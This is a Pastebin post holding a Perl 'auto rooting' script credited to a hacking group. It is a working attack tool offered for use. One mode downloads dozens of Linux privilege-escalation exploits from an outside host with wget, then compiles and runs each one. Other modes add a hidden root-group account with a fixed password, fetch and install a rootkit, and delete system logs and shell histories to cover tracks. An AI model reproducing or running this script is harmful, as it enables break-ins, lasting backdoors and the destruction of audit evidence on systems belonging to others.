Advertisement
sirnon

autoroot

Jul 24th, 2013
154
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.47 KB | None | 0 0
  1. #!/usr/bin/perl
  2.  
  3. #
  4.  
  5. # Auto Rooting Script ver 1.0
  6.  
  7. # BHG Security Center ~ #bhg
  8.  
  9. # _____ __ __________ __
  10.  
  11. # / _ \ __ ___/ |_ ____ \______ \ ____ _____/ |_
  12.  
  13. # / /_\ \| | \ __\/ _ \ | _// _ \ / _ \ __\
  14.  
  15. #/ | \ | /| | ( <_> ) | | ( <_> | <_> ) |
  16.  
  17. #\____|__ /____/ |__| \____/ |____|_ /\____/ \____/|__|
  18.  
  19. # \/ \/
  20.  
  21. #To start script "perl autoroot.pl r00t"
  22.  
  23. #Developers: Net.Edit0r ~ tHe.k!ll3r
  24.  
  25. #Home : Http://black-hg.org/cc
  26.  
  27. #Contact : Net.Edit0r@att.net ~ Black.hat.tm@Gmail.com
  28.  
  29. #Greetz to all members of BHG Security Center
  30.  
  31. print "###########################################################\n";
  32.  
  33. print "# Auto rooter by #BHG (Net.Edit0r) #\n";
  34.  
  35. print "# Usage : #\n";
  36.  
  37. print "# perl $0 r00t => To root #\n";
  38.  
  39. print "# perl $0 del => Delete Exploit #\n";
  40.  
  41. print "# perl $0 -kit => Add Rootkit #\n";
  42.  
  43. print "# perl $0 user => Add Root Account #\n";
  44.  
  45. print "# ******************************************** #\n";
  46.  
  47. print "# [Home]: #\n";
  48.  
  49. print "# http://www.black-hg.org/cc #\n";
  50.  
  51. print "###########################################################\n\n\n";
  52.  
  53.  
  54.  
  55.  
  56.  
  57. if ($ARGV[0] =~ "r00t" )
  58.  
  59. {
  60.  
  61. print "Loading system configs";
  62.  
  63. print "...";
  64.  
  65. system("u**** -a");
  66.  
  67. print "...";
  68.  
  69. system("id");
  70.  
  71. print "...";
  72.  
  73. print "...";
  74.  
  75. print "Gathering Exploit range";
  76.  
  77. print "28 exploits found";
  78.  
  79. print "Test Exploit F0r Rooting :D ...";
  80.  
  81. system("wget http://net-edit0r.persiangig.com/r00t/local");
  82.  
  83. system("chmod 777 local");
  84.  
  85. system("./local");
  86.  
  87. system("id");
  88.  
  89. system("wget http://net-edit0r.persiangig.com/r00t/2.6.18.1.c");
  90.  
  91. system("gcc 2.6.18.1.c -o 2.6.18.1");
  92.  
  93. system("chmod 777 2.6.18.1");
  94.  
  95. system("./2.6.18.1");
  96.  
  97. system("id");
  98.  
  99. system("wget http://net-edit0r.persiangig.com/r00t/2.6.34.2");
  100.  
  101. system("chmod 777 2.6.34.2");
  102.  
  103. system("./2.6.34.2");
  104.  
  105. system("id");
  106.  
  107. system("wget http://net-edit0r.persiangig.com/r00t/2.6.33.c");
  108.  
  109. system("gcc 2.6.33.c -o 2.6.33");
  110.  
  111. system("chmod 777 2.6.33");
  112.  
  113. system("./2.6.33");
  114.  
  115. system("id");
  116.  
  117. system("wget http://net-edit0r.persiangig.com/r00t/2.6.34.c");
  118.  
  119. system("gcc -w 2.6.34.c -o 2.6.34");
  120.  
  121. system("sudo setcap cap_sys_admin+ep 2.6.34");
  122.  
  123. system("./2.6.34");
  124.  
  125. system("id");
  126.  
  127. system("wget http://net-edit0r.persiangig.com/r00t/2.6.37.c");
  128.  
  129. system("gcc 2.6.37.c -o 2.6.37");
  130.  
  131. system("chmod 777 2.6.37");
  132.  
  133. system("./2.6.37");
  134.  
  135. system("id");
  136.  
  137. system("wget http://net-edit0r.persiangig.com/r00t/2.6.43.2.c");
  138.  
  139. system("gcc -w 2.6.43.2.c -o 2.6.43.2");
  140.  
  141. system("sudo setcap cap_sys_admin+ep 2.6.43.2");
  142.  
  143. system("chmod 777 2.6.43.2");
  144.  
  145. system("./2.6.43.2");
  146.  
  147. system("id");
  148.  
  149. system("wget http://net-edit0r.persiangig.com/r00t/2.6.18.194.c");
  150.  
  151. system("gcc 2.6.18.194.c -o 2.6.18.194");
  152.  
  153. system("chmod 777 2.6.18.194");
  154.  
  155. system("./2.6.18.194");
  156.  
  157. system("id");
  158.  
  159. system("wget http://net-edit0r.persiangig.com/r00t/3.0.c");
  160.  
  161. system("gcc 3.0.c -o 3.0");
  162.  
  163. system("chmod 777 3.0");
  164.  
  165. system("./3.0");
  166.  
  167. system("id");
  168.  
  169. system("wget http://net-edit0r.persiangig.com/r00t/2.6.18-2010/2.6.18");
  170.  
  171. system("chmod 777 2.6.18");
  172.  
  173. system("./2.6.18");
  174.  
  175. system("id");
  176.  
  177. system("wget http://net-edit0r.persiangig.com/r00t/x86_845.c");
  178.  
  179. system("gcc -o x86_84 x86_845.c");
  180.  
  181. system("chmod 777 x86_84");
  182.  
  183. system("./x86_84");
  184.  
  185. system("id");
  186.  
  187. system("wget http://net-edit0r.persiangig.com/r00t/abi5.c");
  188.  
  189. system("gcc -o abi abi5.c");
  190.  
  191. system("chmod 777 abi");
  192.  
  193. system("./abi");
  194.  
  195. system("id");
  196.  
  197. system("wget http://net-edit0r.persiangig.com/r00t/2.6.2-20105.c");
  198.  
  199. system("gcc -o 2.6.2-20105 2.6.2-20105.c");
  200.  
  201. system("chmod 777 2.6.2-20105");
  202.  
  203. system("./2.6.2-20105");
  204.  
  205. system("id");
  206.  
  207. system("wget http://net-edit0r.persiangig.com/r00t/2.6.13-20105.c");
  208.  
  209. system("gcc -o 2.6.13 2.6.13-20105.c");
  210.  
  211. system("chmod 777 2.6.13");
  212.  
  213. system("./2.6.13");
  214.  
  215. system("id");
  216.  
  217. system("wget http://net-edit0r.persiangig.com/r00t/2.6.325.c");
  218.  
  219. system("gcc -o 2.6.32 2.6.325.c");
  220.  
  221. system("chmod 777 2.6.32");
  222.  
  223. system("./2.6.32");
  224.  
  225. system("id");
  226.  
  227. system("wget http://net-edit0r.persiangig.com/r00t/2.6.39.c");
  228.  
  229. system("gcc -o 2.6.39 2.6.39.c");
  230.  
  231. system("chmod 777 2.6.39");
  232.  
  233. system("./2.6.39");
  234.  
  235. system("id");
  236.  
  237. system("wget http://net-edit0r.persiangig.com/r00t/2.6.11.c");
  238.  
  239. system("gcc -o 2.6.11 2.6.11.c");
  240.  
  241. system("chmod 777 2.6.11");
  242.  
  243. system("./2.6.11");
  244.  
  245. system("id");
  246.  
  247. system("wget http://net-edit0r.persiangig.com/r00t/2.6.182.c");
  248.  
  249. system("gcc -o 2.6.182 2.6.182.c");
  250.  
  251. system("chmod 777 2.6.182");
  252.  
  253. system("./2.6.182");
  254.  
  255. system("id");
  256.  
  257. system("wget http://net-edit0r.persiangig.com/r00t/2.6.13.c");
  258.  
  259. system("gcc -o 2.6.13 2.6.13.c");
  260.  
  261. system("chmod 777 2.6.13");
  262.  
  263. system("./2.6.13");
  264.  
  265. system("id");
  266.  
  267. system("wget http://net-edit0r.persiangig.com/r00t/2.6.18-6.c");
  268.  
  269. system("gcc -o 2.6.18-6 2.6.18-6.c");
  270.  
  271. system("chmod 777 2.6.18-6");
  272.  
  273. system("./2.6.18-6");
  274.  
  275. system("id");
  276.  
  277. system("wget http://net-edit0r.persiangig.com/r00t/2010/robert_you_suck.c");
  278.  
  279. system("gcc -o kroooz robert_you_suck.c");
  280.  
  281. system("chmod 777 kroooz");
  282.  
  283. system("./kroooz");
  284.  
  285. system("id");
  286.  
  287. system("wget http://net-edit0r.persiangig.com/r00t/2010/sec.c");
  288.  
  289. system("gcc -o sec sec.c");
  290.  
  291. system("chmod 777 sec");
  292.  
  293. system("./sec");
  294.  
  295. system("id");
  296.  
  297. system("wget http://net-edit0r.persiangig.com/r00t/2010/2.6.18");
  298.  
  299. system("chmod 777 2.6.18");
  300.  
  301. system("./2.6.18");
  302.  
  303. system("id");
  304.  
  305. system("wget http://net-edit0r.persiangig.com/r00t/2010/priv8-2.6.18-164-2010");
  306.  
  307. system("chmod 777 priv8-2.6.18-164-2010");
  308.  
  309. system("./priv8-2.6.18-164-2010");
  310.  
  311. system("id");
  312.  
  313. system("wget http://net-edit0r.persiangig.com/r00t/2010/priv8-2.6.18.2010");
  314.  
  315. system("chmod 777 priv8-2.6.18.2010");
  316.  
  317. system("./priv8-2.6.18.2010");
  318.  
  319. system("id");
  320.  
  321. system("wget http://net-edit0r.persiangig.com/r00t/2010/2010-1");
  322.  
  323. system("chmod 777 2010-1");
  324.  
  325. system("./2010-1");
  326.  
  327. system("id");
  328.  
  329. system("wget http://net-edit0r.persiangig.com/r00t/2010/local2627");
  330.  
  331. system("chmod 777 local2627");
  332.  
  333. system("./local2627");
  334.  
  335. system("id");
  336.  
  337. system("wget http://net-edit0r.persiangig.com/r00t/2010/ia32syscall");
  338.  
  339. system("chmod 777 ia32syscall");
  340.  
  341. system("./ia32syscall");
  342.  
  343. system("id");
  344.  
  345. print "Exploit 11 ...";
  346.  
  347. system("u**** -a");
  348.  
  349. system("id;pwd");
  350.  
  351. print "Fucking r00t!? :d";
  352.  
  353.  
  354.  
  355. }
  356.  
  357. if ($ARGV[0] =~ "del" )
  358.  
  359. {
  360.  
  361. print "All Exploit deleting ...\n";
  362.  
  363. system("rm local*;rm -rf 2.6*;rm 3.0*;rm -rf 3.0*;rm -rf 2.6.34.2;rm -rf 2.6.18.194;rm -rf 2.6.13;rm -rf 2.6.182;rm -rf 2.6.11");
  364.  
  365. system("rm 2.6.39*;rm -rf 2.6.32*;rm 2.6.2*;rm -rf abi*;rm -rf x86_84;rm -rf 2.6.2-20105;rm -rf 2.6.325;rm -rf 2.6.18-6");
  366.  
  367. system("rm ia32syscall;rm -rf local2627;rm -rf 2010-1;rm -rf priv8-2.6.18.2010;rm -rf priv8-2.6.18-164-2010;rm -rf sec.c;rm -rf robert_you_suck.c;rm -rf 2.6.18-6.c");
  368.  
  369. }
  370.  
  371. if ($ARGV[0] =~ "user" )
  372.  
  373. {
  374.  
  375. print "Add Root Account [ t ]\n";
  376.  
  377. print "user : [ roor ]\n";
  378.  
  379. system "adduser -g 0 roor -G wheel,sys,bin,daemon,adm,disk -d /sf7 -s /bin/sh";
  380.  
  381. system "passwd rootbhg";
  382.  
  383. print "pass is : rootbhg\n";
  384.  
  385. sleep(2);
  386.  
  387.  
  388.  
  389. }
  390.  
  391. if ($ARGV[0] =~ "rm" )
  392.  
  393. {
  394.  
  395. print "rm -rf Log [ rm ] \n";
  396.  
  397. system "rm -rf /tmp/logs";
  398.  
  399. system "rm -rf /root/.ksh_history";
  400.  
  401. system "rm -rf /root/.bash_history";
  402.  
  403. system "rm -rf /root/.bash_logout";
  404.  
  405. system "rm -rf /usr/local/apache/logs";
  406.  
  407. sleep(2);
  408.  
  409. system "rm -rf /usr/local/apache/log";
  410.  
  411. system "rm -rf /var/apache/logs";
  412.  
  413. system "rm -rf /var/apache/log";
  414.  
  415. system "rm -rf /var/run/utmp";
  416.  
  417. system "rm -rf /var/logs";
  418.  
  419. system "rm -rf /var/log";
  420.  
  421. sleep(2);
  422.  
  423. system "rm -rf /var/adm";
  424.  
  425. system "rm -rf /etc/wtmp";
  426.  
  427. system "rm -rf /etc/utmp";
  428.  
  429. system "cd /bin";
  430.  
  431. print "\tcompleted .. \n\n";
  432.  
  433. }
  434.  
  435. if ($ARGV[0] =~ "-kit" )
  436.  
  437. {
  438.  
  439. print "Add Rootkit \n";
  440.  
  441. system "wget http://net-edit0r.persiangig.com/t00lz/rootkit.tar.gz";
  442.  
  443. system "tar -xvvzf rootkit.tar.gz";
  444.  
  445. system "cd rootkit;./install";
  446.  
  447. print "user : wo7oshv4team , pass : v4teamhacker \n";
  448.  
  449. system "id";
  450.  
  451. print "\tcompleted .. \n\n";
  452.  
  453. }
  454.  
  455. # Code By Net.Edit0r ~ tHe.k!ll3r For ALL Iranian HackerZ /* Persian Gulf F0r Ever */
  456.  
  457. # END
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement